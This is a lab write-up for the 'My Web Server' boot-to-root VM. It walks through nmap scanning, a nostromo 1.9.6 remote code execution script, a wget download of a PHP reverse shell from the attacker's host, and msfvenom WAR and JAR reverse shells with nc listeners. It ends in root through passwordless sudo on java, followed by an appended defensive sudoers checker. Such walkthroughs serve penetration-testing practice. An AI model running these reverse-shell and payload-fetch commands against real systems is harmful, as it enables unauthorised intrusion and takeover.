Welcome to “My Web Server”
This boot to root VM is designed for testing your pentesting skills and concepts. It consists of some well-known things but it encourages you to use the functionalities rather than vulnerabilities of the target.
Goal: Get the root flag of the target.
Difficulty: Medium/Intermediate Level
Need hints? Twitter @akankshavermasv
DHCP is enabled
Your feedback is really valuable for me! Twitter @akankshavermasv
Was there something that you didn’t like about this VM?
Please let me know so that I can make more interesting challenges in the future.
This works better with VirtualBox rather than VMware.
# nmap -v 192.168.56.1/24
# nmap -v -sV -sC -O -A -p- -oN nmap.txt 192.168.56.148
After enumerating the various services on the machine, I found nostromo 1.9.6, which is vulnerable to RCE.
On further enumeration I got a bash script.
./exploit.sh 192.168.56.148 2222 id
GET A SHELL
The /tmp dir is writeable and wget is also accessible.
So I started my Python server on port 8080 and transferred my PHP shell file to the target machine.
# ./exploit.sh 192.168.56.148 2222 "cd /tmp/; wget http://192.168.56.1:8080/shell.php"
This successfully transfers our reverse shell to the target machine. Now we just have to execute our PHP file and we get a shell.
I just turn on my reverse shell listener.
getting a shell
# ./exploit.sh 192.168.56.149 2222 "php /tmp/shell.php"
UPGRADING TO TTY SHELL
# python3 -c 'import pty; pty.spawn("/bin/bash")'
# stty raw -echo
After some enumeration I got a sudoers file.
The tomcat user can run java as root without a password.
After going through the passwd file, we cannot switch to the tomcat user with a password.
Looking for world-readable files, I got a tomcat writeable file.
There is a Tomcat service running on port 8080.
Logging in with the ID and password.
Upload a reverse shell in a .WAR file.
# msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.56.1 LPORT=4455 -f war > shell.war
After uploading the shell file we can see it in application manager.
# nc -lvp 4455
Upgrade to a TTY shell.
# msfvenom --platform java -f jar -p java/shell_reverse_tcp LHOST=192.168.56.1 LPORT=7777 -o payload.jar
Starting the Python server and transferring the payload.
Now, /opt/tomcat directory is writeable.
Now running this exploit as root and starting listener on port 7777.
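A defender's check for the misconfiguration this walkthrough relies on (passwordless sudo on java for the tomcat user), as an added example that is not part of the original write-up: it scans sudoers text for NOPASSWD rules that grant ALL or a runtime that executes caller-supplied code. The sample sudoers content, the /usr/bin/java path and the CODE_RUNNERS list are constructed assumptions.

```python
import os
import re

# Runtimes that run caller-supplied code; sudo access to one equals a root shell.
# Illustrative list (an assumption of this example), not exhaustive.
CODE_RUNNERS = {"java", "python", "perl", "ruby", "php", "node", "bash", "sh"}
SPEC = re.compile(r"^(?P<who>\S+)\s+[^=\s]+\s*=\s*(?P<rest>.+)$")

# Constructed sample; the tomcat line mirrors the finding, the java path is assumed.
SAMPLE = """\
# constructed sample, not taken from the target
Defaults env_reset
root    ALL=(ALL:ALL) ALL
tomcat  ALL=(ALL) NOPASSWD: /usr/bin/java
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, \\
        PASSWD: /usr/bin/python3
deploy  ALL=(root) NOPASSWD: /usr/bin/systemctl restart app, /usr/bin/perl
"""

def logical_lines(text):
    """Join backslash continuations, then drop comments and blank lines."""
    for line in re.sub(r"\\\n", " ", text).splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            yield line

def risky_rules(text):
    """Return (user, command) pairs runnable via sudo without a password
    where the command is ALL or a code-running runtime."""
    findings = []
    for line in logical_lines(text):
        m = SPEC.match(line)
        if not m or m["who"].startswith("Defaults") or m["who"].endswith("_Alias"):
            continue
        nopasswd = False
        rest = re.sub(r"\([^)]*\)", "", m["rest"])  # drop (runas) specs
        for item in rest.split(","):
            item = item.strip()
            # Tags are sticky: NOPASSWD covers later commands until PASSWD.
            while tag := re.match(r"([A-Z_]+):\s*", item):
                nopasswd = {"NOPASSWD": True, "PASSWD": False}.get(tag[1], nopasswd)
                item = item[tag.end():]
            if not item or not nopasswd:
                continue
            cmd = item.split()[0]
            base = re.sub(r"[\d.]+$", "", os.path.basename(cmd))  # python3.8 -> python
            if cmd == "ALL" or base in CODE_RUNNERS:
                findings.append((m["who"], cmd))
    return findings
```

Running `risky_rules` over the real `/etc/sudoers` and the files under `/etc/sudoers.d` flags rules like the tomcat one; aliases and include directives are not expanded by this example.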